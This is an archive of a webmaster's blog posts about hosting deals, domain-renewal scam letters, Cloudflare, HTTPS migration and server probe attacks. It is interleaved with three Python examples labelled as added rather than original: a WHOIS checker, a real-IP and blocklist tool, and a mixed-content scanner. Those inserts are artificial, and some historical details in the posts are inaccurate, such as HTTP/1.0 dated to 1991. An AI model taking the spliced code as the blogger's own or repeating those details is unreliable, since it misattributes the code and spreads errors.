October 16, 2021

Webhosting Deal Alert!


Do you need web hosting now?
If you have been thinking about getting a website online, you need to first arrange for web hosting with a web hosting provider. If you aren't covered in money (I'm not), Hostgator is offering a 19th birthday celebration sale with 70% Off all new† 12 to 36 month shared web hosting accounts from Monday, October 18, at 12:00 AM CST, through Friday, October 22, at 11:59 PM CST 2021. This offer includes free domain registration, as well as a free Let's Encrypt SSL certificate.*

The same deal applies to people who already have a website hosted with a different provider, whose hosting account is about to expire and come up for renewal. If you simply renew your hosting with your existing provider you may be in for a big surprise, because it is customary in the web hosting business model to offer new customers a big discount on the first term but to jack up the rate for renewals. This is the opposite of the treatment software companies use, where you get a price cut to renew or upgrade to the newest version of a program.

Whether you belong to the first category or the second one, you are going to save big bucks if you take advantage of this very limited time offer.

* A Secure Sockets Layer (SSL) certificate is what allows a web page to be served over the secure HTTPS protocol, which encrypts data going both ways between a web browser and the web server. This ensures that any data you type or paste into a contact or card payment form cannot be viewed in readable form by a man-in-the-middle attacker who might try to intercept traffic to that website.

† This deal only applies to new customers with Hostgator. If you currently have an active Hostgator account you cannot use these links to save on a renewal or upgrade fee.

70% Off Shared Web Hosting now!

If you happen to miss this 70% off flash sale, or simply aren't ready to make a change, here is another link that will save you up to 60% off new† Hostgator hosting packages. Save Up to 60% Off New Hosting + $4.99 on Select Domains with Promo Code 60OFF2017!

Why am I posting this? It is simple. Not only am I a satisfied web hosting customer, I am also an affiliate for Hostgator. If anybody clicks or taps on my image or text links and signs up for a new account, I will earn a very useful commission. If you find this information useful and plan to get or change web hosting soon, why not do it now and take advantage of this money saving offer before it expires?

Hint: if you are a previous customer without an active hosting package with HG you can take advantage of this offer!

June 5, 2021

Domain Registry renewal pitch is back again

If you own Internet domain names, like example.com, you should know by now that they have to be renewed after your initial term expires. Some of you got your first year of domain registration for free when you signed up for web hosting. Others may have paid up front to register a domain for multiple years. After that initial term you should have received renewal notices from the domain registrar or hosting company, either telling you they were auto-renewing your domain name or asking you to update your payment information. Those notices would be sent to the email address on file with your domain registrar or web host. Failure to renew a domain will result in any websites tied to it going offline shortly after it expires.

Let's stop at this point so I can define some of the terms I used in the first paragraph. You need to understand what they mean if you own, or want to buy domain names and have online websites.


  • A "Domain," in this context, refers to a digital asset that can be used to point to a website or other online presence, like a file server, database or even a social network.

  • A domain "name" is an alpha-numeric name somebody chooses to use for a website or an online accessible asset. Some companies use domain names on internal networks, but that is not within the context of this article. A domain name has two parts: the prefix and the extension. You choose an available prefix, then add the available extension. A classic example is "example.com." There are numerous domain extensions, like .com, .net, .info, .org, etc.

  • A Domain "Registrar" is a company whose business includes registering domain names and entering them into a worldwide database. Unless Registrars are accredited by the official licensing body, ICANN, they are merely acting as middlemen for someone else who is accredited. Once a domain name is registered and entered into the official registry, it cannot be registered to anybody else unless it expires and is not renewed.

  • A "Website" (a.k.a.: web site), in this context, is an online presence for a domain that has publicly or privately viewable content that is reached over the Internet. For the sake of clarity, I am referring to websites like mine: wizcrafts.net.

  • A "web host" (or hosting company) is a business that owns huge numbers of bare metal computers known as "servers," housed in climate controlled warehouses. They provide the digital space for their customers to create websites and have them viewable over the Internet.

  • If you are reading this you know what the "Internet" is.

Moving along, last year I wrote a blog article about the Domain Registry (of America) registration renewal scam letter I got in the mail. Well, I just got another letter from this company, located in Bergen, New Jersey, notifying me that one of my domain names was about to expire and that I needed to renew it quickly to maintain its online presence. The fee they are asking for is $50 for one year or $90 for two years. Those rates are through the roof in today's domain registration market! I can renew a .com or .net domain for between $10 and $16 US dollars per year at Domain.com or Cloudflare.

I went to the new website shown in the letter I got from them and they have dropped the words "of America," but the logo still contains "Domain Registry" next to a round portion of an American flag. They have a confusing double business name: "Global Internet Ventures" and "Internet Domain Name Services Inc." Nowhere on any of their few web pages is there any mention of them being accredited by ICANN. Any legitimate Registrar will proudly display the ICANN Accredited logo. It appears that Domain Registry, et al., is just a middleman for somebody else. Their exorbitant markup of $50 for registrations and renewals makes it plain that they aren't trying to compete for your business. They are getting sales from the letters they mail out to registered domain owners, trying to fool them into transferring to Domain Registry from their existing registrar (which is likely much lower priced in the first place). They are hoping you are too busy to read the fine print or look up who your registrar is, and that you will pay them through the nose for the privilege of being bent over by DROA.

There is a funny twist to this story. It so happens that the domain name they wanted me to pay $50 to renew before it expires is already expired! It isn't assigned to me or anybody else. It went to the bit bucket in the sky! So much for doing their homework!

Now that you know the facts, if you own a domain that is coming up for renewal and wonder if you are paying too much, check out my Registrar: Domain.com. As for web hosting, I currently use InMotion Hosting.

I may receive a commission on sales generated through my affiliate links. This isn't a bad thing! It is a way to survive in a big dog little dog world.

Here's a heads up! No matter how many years you register your domains for at a time, it is imperative that you periodically log in to the place where they are registered and make sure that your contact info and email address are up to date. A lot of people lose their domain names because they failed to update their email address and didn't receive the notice that the renewal time was approaching. Credit and debit cards usually expire in 3 years. If you took a 5 or 10 year domain registration up front, your card on file may be outdated. If you don't receive the email notices you will lose your domain when the due date passes without payment. If you don't know or remember who the Registrar is, you can find out by doing a "Whois" lookup on the domain name (e.g., example.com).
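The Whois check above, as an added example (not code from the original post): it pulls the registrar of record and the expiry date out of WHOIS output, says how urgent renewal is, and tells you whether the company on a mailed "expiration notice" is actually your registrar. The WHOIS record is constructed, and the field labels follow the common .com/.net layout; other extensions label fields differently, so the label list is an assumption to extend.

```python
"""Compare a mailed "renewal notice" against the WHOIS facts for a domain.
Added example, not the original post's code.  SAMPLE_WHOIS is constructed;
EXPIRY_KEYS and DATE_FORMATS cover the common .com/.net layout only."""
import re
from datetime import datetime, timezone

# Constructed sample of what a `whois example.com` query returns (values made up).
SAMPLE_WHOIS = """\
Domain Name: EXAMPLE.COM
Registry Domain ID: 0000000_DOMAIN_COM-CONSTRUCTED
Registrar WHOIS Server: whois.example-registrar.test
Registrar URL: http://www.example-registrar.test
Updated Date: 2021-05-01T10:00:00Z
Creation Date: 2008-08-14T04:00:00Z
Registry Expiry Date: 2021-09-15T04:00:00Z
Registrar: Example Registrar, LLC
Registrar IANA ID: 9999
Registrar Abuse Contact Email: abuse@example-registrar.test
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.EXAMPLE-HOST.TEST
>>> Last update of whois database: 2021-06-05T00:00:00Z <<<
"""

FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z /]*?):\s*(\S.*?)\s*$")
EXPIRY_KEYS = ("registry expiry date", "registrar registration expiration date",
               "expiry date", "expiration date")
DATE_FORMATS = ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%d", "%d-%b-%Y")


def parse_whois(text):
    """Return {lower-case label: value} for 'Label: value' lines; first value wins."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields.setdefault(m.group(1).strip().lower(), m.group(2))
    return fields


def expiry_date(fields):
    """Parse the expiry timestamp, trying the known labels and date formats."""
    for key in EXPIRY_KEYS:
        raw = fields.get(key)
        if not raw:
            continue
        for fmt in DATE_FORMATS:
            try:
                return datetime.strptime(raw, fmt).replace(tzinfo=timezone.utc)
            except ValueError:
                pass
    return None


def renewal_check(text, today, warn_days=90):
    """Summarise who holds the registration and how urgent renewal is.
    `today` may be a UTC datetime or a 'YYYY-MM-DD' string."""
    if isinstance(today, str):
        today = datetime.strptime(today, "%Y-%m-%d").replace(tzinfo=timezone.utc)
    fields = parse_whois(text)
    exp = expiry_date(fields)
    days_left = (exp - today).days if exp else None
    if days_left is None:
        action = "unknown expiry: log in at the registrar and check"
    elif days_left < 0:
        action = "expired"
    elif days_left <= warn_days:
        action = "renew soon (at the registrar named here, not a mailed offer)"
    else:
        action = "ok"
    return {"domain": fields.get("domain name", "?").lower(),
            "registrar": fields.get("registrar", "unknown"),
            "expires": exp, "days_left": days_left, "action": action}


def letter_matches_registrar(letter_sender, whois_text):
    """True only if the company on a mailed notice is the registrar of record."""
    fields = parse_whois(whois_text)
    return letter_sender.strip().lower() in fields.get("registrar", "").lower()


if __name__ == "__main__":
    print(renewal_check(SAMPLE_WHOIS, "2021-06-05"))
    print("letter sender is my registrar?",
          letter_matches_registrar("Domain Registry", SAMPLE_WHOIS))
```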

Finally, if you are new to all this and have a website that needs work, consider me as your Webmaster. See my Webmaster Services page for more details.

Thanks for your time.

September 3, 2020

Return of the Domain Registry renewal notice sales pitch

A few days ago I got a letter in the mail, addressed to "Domain Owner," from an outfit calling themselves Domain Registry, with a return address of 924 Bergen Ave, Suite #289, Jersey City, NJ 07306-3018. The address also contained one of my registered domain names.

The envelope boldly proclaimed the following, in bold blue and red type: "Renewal Information Enclosed - OPEN IMMEDIATELY." Inside I found a letter headed, in large bold type, "Domain Name Expiration Notice." The letter told me that the named domain was due to expire in a couple months and that I needed to renew it to maintain my exclusive rights to it and my "online identity." The letter informed me that I could conveniently transfer the expiring domain to Domain Registry to save money with their "best savings" prices. Those prices were $50 for 1 year, $90 for 2 years and $190 for 5 years registration. It went on to offer the two optional domain name extensions: .net and .org, both listed for $90 for 2 years.

Domain owners who have had domains for a long time will remember getting these same scams from Domain Registry Of America. This is the same outfit, just using a truncated business name. Further, their website URL has changed to giv.com, which is short for Global Internet Ventures.

Continue reading "Return of the Domain Registry renewal notice sales pitch" »

July 19, 2020

Cloudflare's Rocket Loader disabled editing in my MT blog

Cloudflare is an online service that protects websites from various online attacks, blocks unwanted traffic with a user configurable firewall, caches website content to serve it faster than one's own hosting company and provides SSL security certificates, among other things.

I am a long time Cloudflare subscriber and late last year I changed web hosts. I exported and transferred my blog's database to my new host and got my Movable Type blog up and running. However, I was unable to either edit existing posts or create new ones. No matter what I tried, the only way to edit it was by disabling Cloudflare on my website and then enabling it when my editing was done. The cause and solution remained a mystery until July 19, 2020.

I was experimenting with various settings on Cloudflare and one caught my eye. It is a special function called "Rocket Loader." It was enabled, and had been since I switched hosting companies. The moment I switched off Rocket Loader my blog posts became editable! Evidently this function, which speeds up scripts by compressing their white space, broke some of the scripts used in my version of Movable Type.

If you, or somebody you know, is using Cloudflare and is having trouble editing or creating posts in a Movable Type blog, or some other brand of CMS, Rocket Loader may be at fault. You can find it by logging into your Cloudflare account, selecting your website if you have more than one there, clicking on the Speed tab, then on Optimization, and scrolling down to Rocket Loader; click on the switch button to turn it off. The change is instantaneous, or close to it. Turning it back on also happens quickly.

Fortunately for me I have been busy with other pursuits. I guess I developed writers' block for the last half year and didn't have much to say on my computer troubleshooting blog. Now that I have disabled the Rocket Loader I can get back to writing blog articles about online security issues that concern us all.

September 11, 2019

How I overcame technical difficulties and got my Bluehost websites on Cloudflare

Cloudflare is a content delivery network that protects websites from attacks and unwanted traffic, as well as keeping them online when hosting servers go down. I had my websites on Cloudflare, but left it. Recently, I decided to get back on the service, but it turned out to be more difficult than I anticipated.

Background Information

When I wrote this article, all of my websites were hosted on a shared Bluehost server. One of the available free upgrades was to protect or proxy my website content on a service called Cloudflare. I first got on Cloudflare about 3 years ago after my main website, wizcrafts.net, became a target for spammers and exploit attacks. When you join Cloudflare they route your web traffic through their servers, adding a firewall between the Internet and your website. That firewall automatically blocks tons of known exploit probes without any user interaction. You can further configure the firewall to varying extents depending on whether you have a free account, or are a paying customer. When I first joined, I added many of the IP addresses (in CIDR format) that were either probing me for vulnerable scripts, or attempting to post spam comments on my blog and contact forms. There was also a constant stream of what is known as "referer spam" in my server's access logs. By placing my websites behind the Cloudflare firewall, I got rid of most of these annoyances. However, because Cloudflare substituted its own IP addresses in place of the originals, I couldn't identify the source IP addresses like before. This interfered with my ongoing blocklist work that depended on seeing originating IP addresses in the logs.

After years of laboriously compiling and publishing IP addresses belonging to countries I wanted to block, my time at home grew shorter as other business pursuits took their place. First, I stopped publishing iptables blocklists altogether. Then, I slowed down updating my .htaccess blocklists, which were already pretty effective. I still update the .htaccess blocklists using other means of identifying the source IP addresses, just not as often.

After being off Cloudflare for about 1 year, I decided to go back onto it. Previously, all I had to do was log into my hosting provider's control panel and activate Cloudflare for each of my hosted domains. My web host at the time was Bluehost and they were a designated partner company for integrated Cloudflare activations. Back then, within a few hours of activating Cloudflare, my websites were fully protected and online with Cloudflare. Not so this time around.

To be fair, my previous term on Cloudflare was before I obtained a Let's Encrypt SSL Certificate and my web pages were all delivered as HTTP, not HTTPS. Converting from HTTP into HTTPS was a major undertaking which I detailed in this blog post. In my extended comments, I will outline the obstacles I encountered getting back on Cloudflare and the steps I took to overcome them. Suffice it to say that I am now fully on Cloudflare, with green padlocks for HTTPS and all email and ftp systems online and accessible.
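The lost-source-address problem described in the background section, as an added example (not the post's or Cloudflare's code): once a site is proxied, the address that opens the connection is a Cloudflare edge and the visitor's real address arrives in the CF-Connecting-IP request header. That header can only be trusted when the connecting peer really is Cloudflare, so the function checks the peer against the edge ranges before using it, and then applies a .htaccess-style blocklist to the restored address. The CLOUDFLARE_RANGES networks and the blocklist fragment are constructed placeholders; the real edge ranges come from Cloudflare's published list (an assumption to fill in).

```python
"""Restore the originating client address behind Cloudflare for logging and
blocklist work.  Added example, not Cloudflare's or the original post's code.
CLOUDFLARE_RANGES holds constructed placeholder networks: replace them with
Cloudflare's currently published edge ranges before relying on this."""
import ipaddress

# Placeholder networks standing in for Cloudflare's published edge ranges.
CLOUDFLARE_RANGES = [ipaddress.ip_network(n) for n in
                     ("198.51.100.0/24", "203.0.113.0/24", "2001:db8:cf::/48")]


def from_cloudflare(peer_ip):
    """True if the address that opened the TCP connection is a Cloudflare edge."""
    addr = ipaddress.ip_address(peer_ip)
    return any(addr in net for net in CLOUDFLARE_RANGES)


def real_client_ip(peer_ip, headers):
    """Return (address to log, how it was decided).

    Only a Cloudflare edge can be trusted to have set CF-Connecting-IP.  A
    request that reaches the origin directly can carry any header value, so
    there the peer address itself is logged and the attempt is flagged."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    claimed = hdrs.get("cf-connecting-ip", "").strip()
    if claimed and from_cloudflare(peer_ip):
        try:
            return str(ipaddress.ip_address(claimed)), "cloudflare"
        except ValueError:
            return peer_ip, "bad-header"      # unparsable value; keep the peer
    if claimed:
        return peer_ip, "spoof-attempt"       # header present, peer is not Cloudflare
    return peer_ip, "direct"                  # reached the origin without the proxy


def load_htaccess_cidrs(text):
    """Collect the CIDR/IP arguments of 'Deny from' and 'Require not ip' lines.

    A blocklist keyed on the peer address stops matching once the site is
    proxied, because every peer is then a Cloudflare edge; apply it to the
    restored client address instead."""
    nets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and [p.lower() for p in parts[:2]] == ["deny", "from"]:
            args = parts[2:]
        elif len(parts) >= 4 and [p.lower() for p in parts[:3]] == ["require", "not", "ip"]:
            args = parts[3:]
        else:
            continue
        nets.extend(ipaddress.ip_network(a, strict=False) for a in args)
    return nets


def is_blocked(client_ip, nets):
    addr = ipaddress.ip_address(client_ip)
    return any(addr in net for net in nets)


# Constructed blocklist fragment in the .htaccess style the post describes.
SAMPLE_HTACCESS = """\
# constructed sample
Deny from 192.0.2.0/25
Deny from 2001:db8:bad::/48
Require not ip 192.0.2.200
"""

if __name__ == "__main__":
    nets = load_htaccess_cidrs(SAMPLE_HTACCESS)
    for peer, hdr in [("198.51.100.7", {"CF-Connecting-IP": "192.0.2.44"}),
                      ("192.0.2.99", {"CF-Connecting-IP": "10.0.0.1"}),
                      ("192.0.2.99", {})]:
        ip, how = real_client_ip(peer, hdr)
        print(peer, "->", ip, how, "blocked" if is_blocked(ip, nets) else "allowed")
```

On Apache the same substitution can be done at the server level with mod_remoteip (RemoteIPHeader and RemoteIPTrustedProxy), again listing only the proxy's ranges as trusted.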

Continue reading "How I overcame technical difficulties and got my Bluehost websites on Cloudflare" »

April 2, 2019

iDNS domain name registration scam hits again

This is about an ongoing domain registration scam that happened to be in my mailbox this morning. This is also not the first time I have received such a letter, which closely resembles an invoice, from iDNS, which, according to their letterhead, stands for Internet Domain Name Services.

The subject of the letter, composed in large bold type, is: Domain Name Expiration Notice. The text below it claims that "As a courtesy to domain name holders, we are sending you this notification of the domain name registration that is due to expire in the next few months. When you switch today to Internet Domain Name Services, you can take advantage of our best savings." It goes on to list one of my various domain names that comes up for renewal four months from now.

After that paragraph is a panic call to action, warning me that "now is the time to transfer and renew your name from your current Registrar to Internet Domain Name Services." Then, I am warned that "Failure to renew your domain name by the expiration date may result in a loss of your online identity making it difficult for your customers and friends to locate you on the Web."

A little further down the page is a rate chart that lists my .com domain and offers to renew it for - wait for it - $50 for one year!

Now, let's look at some facts that will take the hot air out of this scam.

Continue reading "iDNS domain name registration scam hits again" »

January 9, 2019

Wizcrafts' Iptables Blocklists Are Gone

After years of maintaining iptables blocklists for no profit, I have decided to terminate them as of January 9, 2019. I am not running a charity organization, nor do I have a staff. This is a one man show paid out of my own pocket.

Originally, I only published a few .htaccess format blocklists which I was using to protect my own website. It was something I did in my spare time. I developed the iptables format as a favor to a few webmasters who contacted me about converting .htaccess format into one CIDR per line Linux firewall format. However, the few small donations I have received over the years don't make a dent in the cost of my web hosting, which only goes up. Additionally, due to the time involved in researching offending IP addresses and their CIDRs, as 2018 progressed, my free time for reading raw access logs and spam email headers to identify foreign IPs became shorter. Consequently, I have not been updating my blocklists as often as in the past.

Please turn off your cron jobs targeting wizcrafts.net

For the last few years my server account has been overrun by automated file downloader tools like WGET, CSF, CURL and others, operating as "cron jobs," that do nothing but scrape the iptables blocklist files, with thousands of hits every day. In fact, these requests now make up the bulk of all traffic to wizcrafts.net, with the same IP addresses sending requests for the same files dozens to hundreds of times per day. Scraper tools do not see my ads, nor make donations. They are like Replicators and I have now banished them from my website. If you have been accessing wizcrafts.net via one of these downloader tools, please turn off the cron job and stop sending your bots here. There is nothing for you here anymore. No soup for you!

Going forward, I will only provide iptables blocklists on a one to one paid basis. Use my Webmaster contact form to discuss private access to my iptables blocklists.

September 23, 2018

Reasons why you should convert your HTTP website into HTTPS

In an article I published on August 22, 2018, I explained the changes I made to convert my long time HTTP website into the more secure HTTPS protocol - by activating a free SSL certificate (read the article). It took a lot of time to clean up old links that were preventing my site from showing a green lock in the address bar. This article will concentrate on the benefits of converting vs the potential losses for staying with just HTTP.

HTTP, introduced in 1991, is the original data transfer protocol employed by computer servers for transmitting web pages that have rich text, layout, multimedia content and images, and rendering them in a visitor's web browser. HTTP is the foundation of the World Wide Web (a.k.a. www). Over the ensuing decades since 1991, the web has evolved in huge leaps, while the HTTP protocol itself has barely changed, from HTTP/1.0 in 1991 to the current HTTP/2.0, adopted in 2015.

While HTTP is great for displaying web page content and input forms, it lacks one important feature. It has no built-in encryption to scramble data that is being transferred between those pages and a viewer's computer browser, or vice versa. Rather, all data that is sent both ways is sent in plain text. This wasn't much of a problem in the days of dial-up modems, before wireless broadband became the norm. Short of obtaining a wiretap warrant, in order for a person to intercept a dial-up data exchange they had to plant spyware or a keylogger on the target computer. The keystrokes and contents of web pages, emails, or private chat programs were saved to hidden text files that they had to come and get later on. There was always a chance of getting caught when they retrieved the stolen data.

Nowadays, data thieves sit in adjacent apartments or houses, office cubicles, coffee shops, mall cafes and restaurants where they connect wirelessly to improperly secured broadband routers that provide Wi-Fi connections to their customers. The programs that capture the data are called "packet sniffers," and the electronic technique used to spy on and capture data flowing between a website and a computer user is called a "Man In The Middle Attack" (a.k.a. MITM). Basically, the people conducting these attacks use a hacking program to find vulnerable wireless routers to connect to and make a copy of any data they are interested in capturing (just like a tape recording of an old time phone line wiretap).

Continue reading "Reasons why you should convert your HTTP website into HTTPS" »

August 22, 2018

How I converted my http website into full https

For two years now, Google has been warning webmasters and domain owners that non-https websites would be flagged as insecure by the mid-summer of 2018. Well, that time arrived on July 24, 2018 with the release of Google Chrome version 68. Anybody browsing the web with Google Chrome 68 or newer will be warned when they visit a non-https website that the site is "not secure" (Source). These websites are considered insecure because data to and from them is sent in plain text, not encrypted. This means that information a visitor types into forms on HTTP websites, or results displayed in the user's browser, could potentially be intercepted or altered by third parties using a "Man In The Middle" program on a networked computer or device. In contrast, pages served via HTTPS are encrypted, making them much harder to decipher if intercepted. This has led to a major push for "HTTPS Everywhere."

Some background information about HTTP and HTTPS

For decades, the average personal website was served by an HTTP server. HTTP stands for HyperText Transfer Protocol and is the foundation of what is known as the World Wide Web. Thus, the URL in the address bar usually began with http:// - unless it was an eCommerce website taking online payments. In those cases, security minded domain owners purchased fairly expensive (SSL) certificates and got dedicated IP addresses, allowing their URL to begin with https://. HTTPS adds encryption to all data flowing between a web server and a web browser, making it HTTPSecure. Note that the SSL protocol has been superseded by the more robust TLS protocol.

Consequences of not upgrading to HTTPS

Since the release of Google Chrome 68 (and also Firefox 58 onward), if a person visiting a non-https website tries to log in, create an account with a username and password, or enter credit/debit card numbers, the browser will discourage or block them from filling in those form fields for their own protection. This will translate into lost inquiries, sales and account sign-ups that would otherwise be sent from those web forms. If that isn't bad enough for the owners of these http websites, Google announced that they will be demoting non-https websites in Google Search results. Preference will be given to fully https websites over the http only sites. If these demoted websites depend upon search traffic and people filling in web forms to conduct their business, this will hurt their web traffic and probably their wallets too. Instead, search traffic may be diverted to their competitors who are running https websites (these websites show an unmistakable green lock in the address bar). If a web page isn't secured, it's hard to miss the gray lock icon in the address bar with a red line or yellow triangle to warn visitors about the danger.

If you show affiliate ads on your pages as a referring publisher, you stand to lose if your pages don't show the green lock. Many enterprising publishers have written useful product or services articles and placed ad banners or text links on pages that may have ranked well in the past - on http websites. That was before the push for HTTPS Everywhere. Now, those pages will begin to drop in the search results pages for the same search terms that previously showed them at or near the top.

Now that I've explained the basic reasons for operating a website under the HTTPS protocol, if you have websites running on just HTTP and want to know how to secure them, read the rest of the story. In it I detail what I had to go through to get a green lock on pages containing affiliate advertising links carried over from my HTTP days.
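The link clean-up mentioned above, as an added example (not the post's own code): an https page only gets the lock once nothing on it is still fetched over plain http, so this scanner walks a page's HTML and reports each http:// sub-resource, separating what browsers block outright (scripts, stylesheets, frames, plugins) from what they merely warn about (images, media). Hyperlinks such as affiliate text links are not resources and are left alone. The sample page is constructed; the fix helper assumes the resource's host also serves https.

```python
"""Find plain-http sub-resources (mixed content) in an https page's HTML.
Added example, not the original post's code; standard library only.
SAMPLE_PAGE is constructed."""
from html.parser import HTMLParser

# Attributes through which each tag fetches a sub-resource.
RESOURCE_ATTRS = {
    "script": ("src",), "link": ("href",), "iframe": ("src",),
    "object": ("data",), "embed": ("src",),
    "img": ("src", "srcset"), "source": ("src", "srcset"),
    "audio": ("src",), "video": ("src", "poster"),
}
# Active content is blocked outright by browsers; passive content only warns.
ACTIVE = {"script", "link", "iframe", "object", "embed"}


class MixedContentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        # Only a <link> that fetches something (stylesheet, icon) is a resource;
        # rel="canonical" or rel="alternate" pointing at http:// is harmless.
        if tag == "link":
            rel = (attrs.get("rel") or "").lower()
            if "stylesheet" not in rel and "icon" not in rel:
                return
        for attr in RESOURCE_ATTRS.get(tag, ()):
            value = attrs.get(attr)
            if not value:
                continue
            # srcset is "url [descriptor], url [descriptor], ..."
            candidates = ([c.strip().split()[0] for c in value.split(",") if c.strip()]
                          if attr == "srcset" else [value.strip()])
            for url in candidates:
                if url.lower().startswith("http://"):
                    self.findings.append({
                        "line": self.getpos()[0], "tag": tag, "attr": attr, "url": url,
                        "severity": "blocked" if tag in ACTIVE else "warning",
                    })


def scan_mixed_content(html):
    """Return a list of http:// resource references found in the HTML."""
    scanner = MixedContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def suggested_fix(url):
    """Same resource over https.  Assumes the host serves https; check that
    first, because an https URL the host does not answer simply breaks."""
    return "https://" + url[len("http://"):]


# Constructed sample page with both kinds of leftover links.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<link rel="canonical" href="http://www.example-blog.test/post.html">
<link rel="stylesheet" href="http://www.example-blog.test/css/old-theme.css">
<script src="https://www.example-blog.test/js/site.js"></script>
<script src="http://ads.example-affiliate.test/banner.js"></script>
</head><body>
<img src="//static.example-blog.test/logo.png" alt="logo">
<img src="http://img.example-affiliate.test/728x90.gif" alt="banner">
<a href="http://merchant.example-affiliate.test/?ref=wiz">affiliate text link, fine</a>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_mixed_content(SAMPLE_PAGE):
        print(f"line {f['line']}: <{f['tag']} {f['attr']}> {f['url']} [{f['severity']}]"
              f" -> {suggested_fix(f['url'])}")
```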

Continue reading "How I converted my http website into full https" »

May 5, 2014

Super discount on website hosting at Hostgator, today, Cinco De Mayo

Today is Cinco de Mayo, a holiday celebrated in Latin America and by its people. To celebrate this annual event, Hostgator is offering a huge, one day only, 45% discount on all new website hosting plans.

If you are thinking about starting up a new website, or want to move an existing one from a more expensive hosting company, today is the time to do it and save some big bucks in the process. Just go to the Hostgator home page, any time today, until 11:59 PM CST, and look over the various types of hosting available. I'm fairly sure you will find one that suits your needs. All of their plans offer a wide range of initial terms, with sliding rates for longer periods of time.

You can save the most money by signing up for 3 years up front. The 45% discount applies to the entire term you sign up for. So, if you go for three years initially, you save on the longer term, plus you get 45% off the usual three year price. Get it? Got it? Good! ;-)

Go to Hostgator now!

February 16, 2014

Massive server probe attack on 2/16/2014

As a concerned web site owner and webmaster I make it a routine to review my daily access logs. I am not only looking at who visited me and from where they were referred, but who was attacking my web site and what probes they were using.

On Sunday, February 16, 2014, I was reading the day's raw access log when I saw an enormous vulnerability probe attack, which encompassed an amazing 2189 individual hack attempts over 12 minutes and 11 seconds. The entire attack came from a compromised dedicated server at 208.115.221.18, which belongs to Limestone Networks and is sub-leased to a Panamanian citizen, who in turn leased the server at that IP address to a company named Towntek.com.

Upon checking out Towntek.com I was greeted by a "default website page," the kind that is displayed when web space has been leased but no content has been uploaded to the public web root and/or no index page has been published.

So, what we have here is yet another undeveloped web site on an unsecured web server that has been hacked and is being used to attack other web sites.

Fortunately for me (fortune favors the prepared mind), I made it a point to learn about common attack vectors used to take over web sites and have protected my web sites against the tactics employed by the remote attacker using 208.115.221.18. This attack is most likely part of a botnet that employs hacked web sites and servers to launch attacks against other web sites and individuals browsing them.

I have since notified Limestone Networks about the compromised account. The assigned owner of the hacked site left no contact information.

Excerpts of the attack are shown in my extended content.

Continue reading "Massive server probe attack on 2/16/2014" »

November 27, 2013

Hostgator's Black Friday through Cyber Monday sale is about to begin!

The annual Black Friday-Cyber Monday web hosting and domain registration sale at Hostgator is set to begin at 12:00 AM, Friday, November 29. It continues through 11:59 PM, Monday, December 2, 2013.

This year, they have outdone themselves, with so-called "Flash Sales" offering discounts of 75% off regular prices, for any and all hosting packages. The first Flash Sale starts on Friday at the stroke of midnight, CST, and runs for one hour until 1 AM, CST, Nov 29. Every hosting package will be priced at 75% off, for your first invoice, which can be any duration from a month, up to 3 years.

There will be additional Flash Sales throughout the weekend, at random times. If you miss out on the Flash Sales, there is still a great 60% off price at all other times.

I have posted details and links to sign up on my Hostgator affiliate page, inside the yellow highlighted section with a red border. Yeah, I'll earn a commission on any sales, but you'll save huge money in the process!

Some things you need to know are:


  1. The discounts only apply to your initial invoice, for as long as your selected package duration lasts. If you sign up for one year, that discount is only good for the first year. I would suggest signing up for 3 years up front, locking in a fantastic rate that most other hosting companies aren't prepared to match.

  2. Existing Hostgator customers can only take advantage of the sale if they purchase a new account, with a new primary domain name. You cannot get out of the normal renewal process via this sale. I know, it sucks ;-(

  3. You can transfer any existing domains to your new account at Hostgator, and/or buy new ones at a significant discount during the sale period.

  4. Hostgator uses cPanel, with all the usual features most of us are used to having. Setting up a new website or transferring your old one should go smoothly. All the usual scripts and .htaccess directives can be used.

See you at Hostgator!

PS: If for some reason you miss this sale, my Hostgator affiliate links will still be good for a 20% discount on your initial invoice, for any hosting package, up to 3 years duration.

September 27, 2013

If you run a WordPress Blog on your own web hosting account, read this.

In my previous article I wrote about an ongoing botnet hacking campaign targeting WordPress Blog installations on web servers around the World. Read this excerpt.


There is an ongoing attack targeting /wp-login.php, /admin.php and /administrator/ for at least a month, if not longer. Most are brute force password crack attempts, but others are exploiting vulnerable code in WordPress itself.

In addition to attacks against the WordPress software (web applications [apps] and CMS programs are in reality, "software"), which was very recently updated, I see regular attempts to exploit popular WordPress plug-ins. Some of these plug-in attacks are over a year old, yet they are ongoing to this day. Why is that?

Hackers continue to probe with old exploits targeting WordPress and its plug-ins - because these attacks work, due to the software not being patched in a timely manner and due to the people administering the blogs not securing them with strong passwords.

According to recently published research by WP White Security, conducted between September 12 - 15, 2013, as many as 73% of the WordPress installations tested were running out-dated, vulnerable versions of the program itself. This research doesn't say anything about out-dated, exploitable plug-ins or weak or default passwords. The WordPress software itself is out-dated on 73% of the web servers tested just after the release of version 3.6.1. Hopefully, in the 12 days that have passed, more people have upgraded to the current version!



June 19, 2013

Summer specials at Dotster, Domain.com and MyDomain


The following is an ad written by me (Wiz). I am an affiliate for this related group of companies (I will earn a small commission if you purchase anything offered here) and am also a long time Dotster customer.

Dotster, Domain.com and MyDomain are all one related company that is in the web hosting and domain name registration business. I originally heard about Dotster in about 1999, on TechTV (now called G4). On that show, Leo Laporte talked about registering domain names and revealed that his choice of "Registrar" was Dotster.

After I learned about Dotster and how domain names that were registered officially could be used for professionally hosted web sites, I went to dotster.com and proceeded to register my first domain name: wizcrafts.net (that's where this blog is located). That was about 13 years ago and I am still using Dotster as my primary Domain Registrar.

Somewhere down the time line I joined an affiliate network that had Dotster as an advertiser. Since I was and am happy with their services and rates, I decided to become an affiliated "publisher" and have promoted Dotster ever since.

Every now and then, Dotster, and its related businesses MyDomain and Domain.com, offer a substantial discount for Registrar and hosting services. I am pleased to let you know that these companies are now offering some really good discounts that are good through July 31, 2013. The details are listed below.

